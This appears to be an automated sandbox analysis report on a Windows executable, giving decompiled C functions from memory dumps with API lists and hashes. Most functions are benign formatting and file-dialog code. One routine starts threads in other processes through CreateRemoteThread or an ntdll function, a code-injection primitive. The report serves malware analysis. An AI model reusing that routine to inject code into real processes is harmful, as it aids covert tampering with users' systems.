                                                                                                  • API String ID: 4235085887-0
                                                                                                  • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                  • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                  • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                  • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 72%
                                                                                                  			E0040B6A6() {
                                                                                                  				intOrPtr _t1;
                                                                                                  				intOrPtr _t2;
                                                                                                  				intOrPtr _t3;
                                                                                                  				intOrPtr _t4;
                                                                                                  
                                                                                                  				_t1 =  *0x41c458;
                                                                                                  				if(_t1 != 0) {
                                                                                                  					_push(_t1);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t2 =  *0x41c460;
                                                                                                  				if(_t2 != 0) {
                                                                                                  					_push(_t2);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t3 =  *0x41c45c;
                                                                                                  				if(_t3 != 0) {
                                                                                                  					_push(_t3);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t4 =  *0x41c464;
                                                                                                  				if(_t4 != 0) {
                                                                                                  					_push(_t4);
                                                                                                  					L0040B272();
                                                                                                  					return _t4;
                                                                                                  				}
                                                                                                  				return _t4;
                                                                                                  			}







                                                                                                  0x0040b6a6
                                                                                                  0x0040b6ad
                                                                                                  0x0040b6af
                                                                                                  0x0040b6b0
                                                                                                  0x0040b6b5
                                                                                                  0x0040b6b6
                                                                                                  0x0040b6bd
                                                                                                  0x0040b6bf
                                                                                                  0x0040b6c0
                                                                                                  0x0040b6c5
                                                                                                  0x0040b6c6
                                                                                                  0x0040b6cd
                                                                                                  0x0040b6cf
                                                                                                  0x0040b6d0
                                                                                                  0x0040b6d5
                                                                                                  0x0040b6d6
                                                                                                  0x0040b6dd
                                                                                                  0x0040b6df
                                                                                                  0x0040b6e0
                                                                                                  0x00000000
                                                                                                  0x0040b6e5
                                                                                                  0x0040b6e6

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                  • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                  • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                  • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* _v16;
                                                                                                  				wchar_t* _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				char _v36;
                                                                                                  				void* __edi;
                                                                                                  				signed int _t39;
                                                                                                  				wchar_t* _t41;
                                                                                                  				signed int _t45;
                                                                                                  				signed int _t48;
                                                                                                  				wchar_t* _t53;
                                                                                                  				wchar_t* _t62;
                                                                                                  				void* _t66;
                                                                                                  				intOrPtr* _t68;
                                                                                                  				void* _t70;
                                                                                                  				wchar_t* _t75;
                                                                                                  				wchar_t* _t79;
                                                                                                  
                                                                                                  				_t66 = __ebx;
                                                                                                  				_t75 = 0;
                                                                                                  				_v8 = 0;
                                                                                                  				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                  						_t68 = _a8;
                                                                                                  						if(_t68 != _t75) {
                                                                                                  							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                  						} else {
                                                                                                  							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                  						}
                                                                                                  						_t41 = wcschr(_t79, 0x2c);
                                                                                                  						_pop(_t70);
                                                                                                  						if(_t41 != 0) {
                                                                                                  							L8:
                                                                                                  							_v20 = _t75;
                                                                                                  							_v28 = _t75;
                                                                                                  							_v36 = _t75;
                                                                                                  							_v24 = 0x100;
                                                                                                  							_v32 = 1;
                                                                                                  							_v16 = 0x22;
                                                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                  							while(1) {
                                                                                                  								_t45 =  *_t79 & 0x0000ffff;
                                                                                                  								__eflags = _t45;
                                                                                                  								_v12 = _t45;
                                                                                                  								_t77 =  &_v36;
                                                                                                  								if(__eflags == 0) {
                                                                                                  									break;
                                                                                                  								}
                                                                                                  								__eflags = _t45 - 0x22;
                                                                                                  								if(__eflags != 0) {
                                                                                                  									_push( &_v12);
                                                                                                  									_t48 = 1;
                                                                                                  									__eflags = 1;
                                                                                                  								} else {
                                                                                                  									_push(L"\"\"");
                                                                                                  									_t48 = _t45 | 0xffffffff;
                                                                                                  								}
                                                                                                  								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                  								_t79 =  &(_t79[0]);
                                                                                                  								__eflags = _t79;
                                                                                                  							}
                                                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                  							_t53 = _v20;
                                                                                                  							__eflags = _t53;
                                                                                                  							if(_t53 == 0) {
                                                                                                  								_t53 = 0x40c4e8;
                                                                                                  							}
                                                                                                  							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                  							_t75 = 0;
                                                                                                  							__eflags = 0;
                                                                                                  						} else {
                                                                                                  							_t62 = wcschr(_t79, 0x22);
                                                                                                  							_pop(_t70);
                                                                                                  							if(_t62 != 0) {
                                                                                                  								goto L8;
                                                                                                  							} else {
                                                                                                  								E00407343(_t66, _a4, _t79);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                  							E00407343(_t66, _a4, ",");
                                                                                                  						}
                                                                                                  						_v8 = _v8 + 1;
                                                                                                  					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t66, _a4, L"\r\n");
                                                                                                  			}























                                                                                                  0x00407362
                                                                                                  0x00407369
                                                                                                  0x0040736e
                                                                                                  0x00407371
                                                                                                  0x00407378
                                                                                                  0x0040737e
                                                                                                  0x00407381
                                                                                                  0x00407386
                                                                                                  0x0040739f
                                                                                                  0x00407388
                                                                                                  0x00407391
                                                                                                  0x00407391
                                                                                                  0x004073a4
                                                                                                  0x004073ac
                                                                                                  0x004073ad
                                                                                                  0x004073cd
                                                                                                  0x004073d0
                                                                                                  0x004073d3
                                                                                                  0x004073d6
                                                                                                  0x004073e0
                                                                                                  0x004073e7
                                                                                                  0x004073ee
                                                                                                  0x004073f5
                                                                                                  0x0040741a
                                                                                                  0x0040741a
                                                                                                  0x0040741d
                                                                                                  0x00407420
                                                                                                  0x00407423
                                                                                                  0x00407426
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004073fc
                                                                                                  0x00407400
                                                                                                  0x0040740f
                                                                                                  0x00407412
                                                                                                  0x00407412
                                                                                                  0x00407402
                                                                                                  0x00407402
                                                                                                  0x00407407
                                                                                                  0x00407407
                                                                                                  0x00407413
                                                                                                  0x00407419
                                                                                                  0x00407419
                                                                                                  0x00407419
                                                                                                  0x0040742f
                                                                                                  0x00407434
                                                                                                  0x00407437
                                                                                                  0x00407439
                                                                                                  0x0040743b
                                                                                                  0x0040743b
                                                                                                  0x0040744e
                                                                                                  0x00407453
                                                                                                  0x00407453
                                                                                                  0x004073af
                                                                                                  0x004073b2
                                                                                                  0x004073ba
                                                                                                  0x004073bb
                                                                                                  0x00000000
                                                                                                  0x004073bd
                                                                                                  0x004073c3
                                                                                                  0x004073c3
                                                                                                  0x004073bb
                                                                                                  0x0040745c
                                                                                                  0x00407468
                                                                                                  0x00407468
                                                                                                  0x0040746d
                                                                                                  0x00407473
                                                                                                  0x0040747c
                                                                                                  0x0040748e

                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 004073A4
                                                                                                  • wcschr.MSVCRT ref: 004073B2
                                                                                                    • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                    • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                  • String ID: "
                                                                                                  • API String ID: 1983396471-123907689
                                                                                                  • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                  • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                  • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                  • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                  				void* _v8;
                                                                                                  				char _v12;
                                                                                                  				char* _v20;
                                                                                                  				long _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				char* _v36;
                                                                                                  				signed int _v40;
                                                                                                  				void _v44;
                                                                                                  				char _v48;
                                                                                                  				char _v52;
                                                                                                  				struct _OSVERSIONINFOW _v328;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t40;
                                                                                                  				intOrPtr* _t44;
                                                                                                  				void* _t49;
                                                                                                  				struct HINSTANCE__** _t54;
                                                                                                  				signed int _t55;
                                                                                                  
                                                                                                  				_t54 = __eax;
                                                                                                  				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                  				GetVersionExW( &_v328);
                                                                                                  				if(_v328.dwMajorVersion < 6) {
                                                                                                  					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                  				}
                                                                                                  				E0040A1EF(_t54);
                                                                                                  				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                  				if(_t44 != 0) {
                                                                                                  					_t55 = 8;
                                                                                                  					memset( &_v44, 0, _t55 << 2);
                                                                                                  					_v12 = 0;
                                                                                                  					asm("stosd");
                                                                                                  					_v36 =  &_v12;
                                                                                                  					_v20 =  &_v52;
                                                                                                  					_v48 = 0x24;
                                                                                                  					_v44 = 0x10003;
                                                                                                  					_v40 = _t55;
                                                                                                  					_v28 = 0x10004;
                                                                                                  					_v24 = 4;
                                                                                                  					_a16 = 0;
                                                                                                  					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					return  !( ~_t40) & _a16;
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}




















                                                                                                  0x0040a27d
                                                                                                  0x0040a286
                                                                                                  0x0040a290
                                                                                                  0x0040a29d
                                                                                                  0x00000000
                                                                                                  0x0040a32f
                                                                                                  0x0040a29f
                                                                                                  0x0040a2a4
                                                                                                  0x0040a2ad
                                                                                                  0x0040a2b6
                                                                                                  0x0040a2bc
                                                                                                  0x0040a2be
                                                                                                  0x0040a2c4
                                                                                                  0x0040a2c8
                                                                                                  0x0040a2ce
                                                                                                  0x0040a2e3
                                                                                                  0x0040a2ed
                                                                                                  0x0040a2fb
                                                                                                  0x0040a2fe
                                                                                                  0x0040a305
                                                                                                  0x0040a30c
                                                                                                  0x0040a30f
                                                                                                  0x0040a313
                                                                                                  0x00000000
                                                                                                  0x0040a31a
                                                                                                  0x0040a338

                                                                                                  APIs
                                                                                                  • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                  • String ID: $
                                                                                                  • API String ID: 283512611-3993045852
                                                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 45%
                                                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                  				char _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				char _v80;
                                                                                                  				signed short _v65616;
                                                                                                  				void* _t27;
                                                                                                  				intOrPtr _t28;
                                                                                                  				void* _t34;
                                                                                                  				intOrPtr _t39;
                                                                                                  				intOrPtr* _t51;
                                                                                                  				void* _t52;
                                                                                                  
                                                                                                  				_t51 = __esi;
                                                                                                  				E0040B550(0x1004c, __ecx);
                                                                                                  				_t39 = 0;
                                                                                                  				_push(0);
                                                                                                  				_push( &_v8);
                                                                                                  				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                  				_push(L"Lines");
                                                                                                  				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                  				if(_v8 > 0) {
                                                                                                  					do {
                                                                                                  						_t6 = _t39 + 1; // 0x1
                                                                                                  						_t28 = _t6;
                                                                                                  						_push(_t28);
                                                                                                  						_push(L"Line%d");
                                                                                                  						_v12 = _t28;
                                                                                                  						_push(0x1f);
                                                                                                  						_push( &_v80);
                                                                                                  						L0040B1EC();
                                                                                                  						_t52 = _t52 + 0x10;
                                                                                                  						_push(0x7fff);
                                                                                                  						_push(0x40c4e8);
                                                                                                  						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                                  							_v65616 = _v65616 & 0x00000000;
                                                                                                  							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                                  							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                                  						} else {
                                                                                                  							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                                  						}
                                                                                                  						_t39 = _v12;
                                                                                                  					} while (_t39 < _v8);
                                                                                                  					return _t34;
                                                                                                  				}
                                                                                                  				return _t27;
                                                                                                  			}













                                                                                                  0x00401676
                                                                                                  0x0040167e
                                                                                                  0x0040168a
                                                                                                  0x0040168c
                                                                                                  0x00401690
                                                                                                  0x00401691
                                                                                                  0x00401696
                                                                                                  0x0040169d
                                                                                                  0x004016a2
                                                                                                  0x004016aa
                                                                                                  0x004016aa
                                                                                                  0x004016aa
                                                                                                  0x004016ad
                                                                                                  0x004016ae
                                                                                                  0x004016b3
                                                                                                  0x004016b9
                                                                                                  0x004016bb
                                                                                                  0x004016bc
                                                                                                  0x004016c1
                                                                                                  0x004016c8
                                                                                                  0x004016cd
                                                                                                  0x004016ce
                                                                                                  0x004016ea
                                                                                                  0x004016ff
                                                                                                  0x0040170c
                                                                                                  0x004016d0
                                                                                                  0x004016e3
                                                                                                  0x004016e3
                                                                                                  0x00401711
                                                                                                  0x00401714
                                                                                                  0x00000000
                                                                                                  0x00401719
                                                                                                  0x0040171c

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf
                                                                                                  • String ID: Line%d$Lines
                                                                                                  • API String ID: 3988819677-2790224864
                                                                                                  • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                  • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                  				void* _v8;
                                                                                                  				void* _v26;
                                                                                                  				void _v28;
                                                                                                  				void* _t24;
                                                                                                  				void* _t25;
                                                                                                  				void* _t35;
                                                                                                  				signed int _t38;
                                                                                                  				signed int _t42;
                                                                                                  				void* _t44;
                                                                                                  				void* _t45;
                                                                                                  
                                                                                                  				_t24 = _a12;
                                                                                                  				_t45 = _t44 - 0x18;
                                                                                                  				_t42 = 0;
                                                                                                  				 *_t24 = 0;
                                                                                                  				if(_a8 <= 0) {
                                                                                                  					_t25 = 0;
                                                                                                  				} else {
                                                                                                  					_t38 = 0;
                                                                                                  					_t35 = 0;
                                                                                                  					if(_a8 > 0) {
                                                                                                  						_v8 = _t24;
                                                                                                  						while(1) {
                                                                                                  							_v28 = _v28 & 0x00000000;
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosd");
                                                                                                  							asm("stosw");
                                                                                                  							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                  							_push(L"%2.2X ");
                                                                                                  							_push(0xa);
                                                                                                  							_push( &_v28);
                                                                                                  							L0040B1EC();
                                                                                                  							_t38 = _t42;
                                                                                                  							memcpy(_v8,  &_v28, 6);
                                                                                                  							_t13 = _t42 + 3; // 0x3
                                                                                                  							_t45 = _t45 + 0x1c;
                                                                                                  							if(_t13 >= 0x2000) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							_v8 = _v8 + 6;
                                                                                                  							_t35 = _t35 + 1;
                                                                                                  							_t42 = _t42 + 3;
                                                                                                  							if(_t35 < _a8) {
                                                                                                  								continue;
                                                                                                  							}
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						_t24 = _a12;
                                                                                                  					}
                                                                                                  					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                  					_t25 = 1;
                                                                                                  				}
                                                                                                  				return _t25;
                                                                                                  			}













                                                                                                  0x00405132
                                                                                                  0x00405135
                                                                                                  0x00405139
                                                                                                  0x0040513e
                                                                                                  0x00405141
                                                                                                  0x004051b3
                                                                                                  0x00405143
                                                                                                  0x00405145
                                                                                                  0x00405147
                                                                                                  0x0040514c
                                                                                                  0x0040514e
                                                                                                  0x00405151
                                                                                                  0x00405151
                                                                                                  0x0040515b
                                                                                                  0x0040515c
                                                                                                  0x0040515d
                                                                                                  0x0040515e
                                                                                                  0x0040515f
                                                                                                  0x00405168
                                                                                                  0x00405169
                                                                                                  0x00405171
                                                                                                  0x00405173
                                                                                                  0x00405174
                                                                                                  0x00405182
                                                                                                  0x00405184
                                                                                                  0x00405189
                                                                                                  0x0040518c
                                                                                                  0x00405194
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405196
                                                                                                  0x0040519a
                                                                                                  0x0040519b
                                                                                                  0x004051a1
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004051a1
                                                                                                  0x004051a3
                                                                                                  0x004051a3
                                                                                                  0x004051a6
                                                                                                  0x004051af
                                                                                                  0x004051b0
                                                                                                  0x004051b7

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                  • String ID: %2.2X
                                                                                                  • API String ID: 2789212964-323797159
                                                                                                  • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                  • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                  • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                  • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 43%
                                                                                                  			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				char _v44;
                                                                                                  				intOrPtr _t22;
                                                                                                  				signed int _t30;
                                                                                                  				signed int _t34;
                                                                                                  				void* _t35;
                                                                                                  				void* _t36;
                                                                                                  
                                                                                                  				_t35 = __esi;
                                                                                                  				_t34 = 0;
                                                                                                  				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                  						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                  						L0040B1EC();
                                                                                                  						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                  						_push( &_v44);
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t36 = _t36 + 0x24;
                                                                                                  						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                  						_t34 = _t34 + 1;
                                                                                                  					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t35, _a4, L"\r\n");
                                                                                                  			}









                                                                                                  0x004075bb
                                                                                                  0x004075c2
                                                                                                  0x004075c7
                                                                                                  0x004075ca
                                                                                                  0x004075cd
                                                                                                  0x004075d8
                                                                                                  0x004075e9
                                                                                                  0x004075fc
                                                                                                  0x00407600
                                                                                                  0x00407601
                                                                                                  0x00407606
                                                                                                  0x00407609
                                                                                                  0x0040760e
                                                                                                  0x00407619
                                                                                                  0x0040761e
                                                                                                  0x0040761f
                                                                                                  0x00407624
                                                                                                  0x00407636

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf
                                                                                                  • String ID: %%-%d.%ds
                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                  • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                  • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                  • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                  • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                  				intOrPtr _v20;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				intOrPtr _v44;
                                                                                                  				intOrPtr _v48;
                                                                                                  				wchar_t* _v52;
                                                                                                  				intOrPtr _v56;
                                                                                                  				intOrPtr _v64;
                                                                                                  				intOrPtr _v68;
                                                                                                  				intOrPtr _v76;
                                                                                                  				struct tagOFNA _v80;
                                                                                                  
                                                                                                  				_v76 = __eax;
                                                                                                  				_v68 = _a4;
                                                                                                  				_v64 = 0;
                                                                                                  				_v44 = 0;
                                                                                                  				_v36 = 0;
                                                                                                  				_v32 = _a8;
                                                                                                  				_v20 = _a12;
                                                                                                  				_v80 = 0x4c;
                                                                                                  				_v56 = 1;
                                                                                                  				_v52 = __esi;
                                                                                                  				_v48 = 0x104;
                                                                                                  				_v28 = 0x81804;
                                                                                                  				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					wcscpy(__esi, _v52);
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}















                                                                                                  0x00405080
                                                                                                  0x00405086
                                                                                                  0x0040508b
                                                                                                  0x0040508e
                                                                                                  0x00405091
                                                                                                  0x00405097
                                                                                                  0x0040509d
                                                                                                  0x004050a4
                                                                                                  0x004050ab
                                                                                                  0x004050b2
                                                                                                  0x004050b5
                                                                                                  0x004050bc
                                                                                                  0x004050cb
                                                                                                  0x004050e0
                                                                                                  0x004050cd
                                                                                                  0x004050d1
                                                                                                  0x004050dc
                                                                                                  0x004050dc

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileNameOpenwcscpy
                                                                                                  • String ID: L
                                                                                                  • API String ID: 3246554996-2909332022
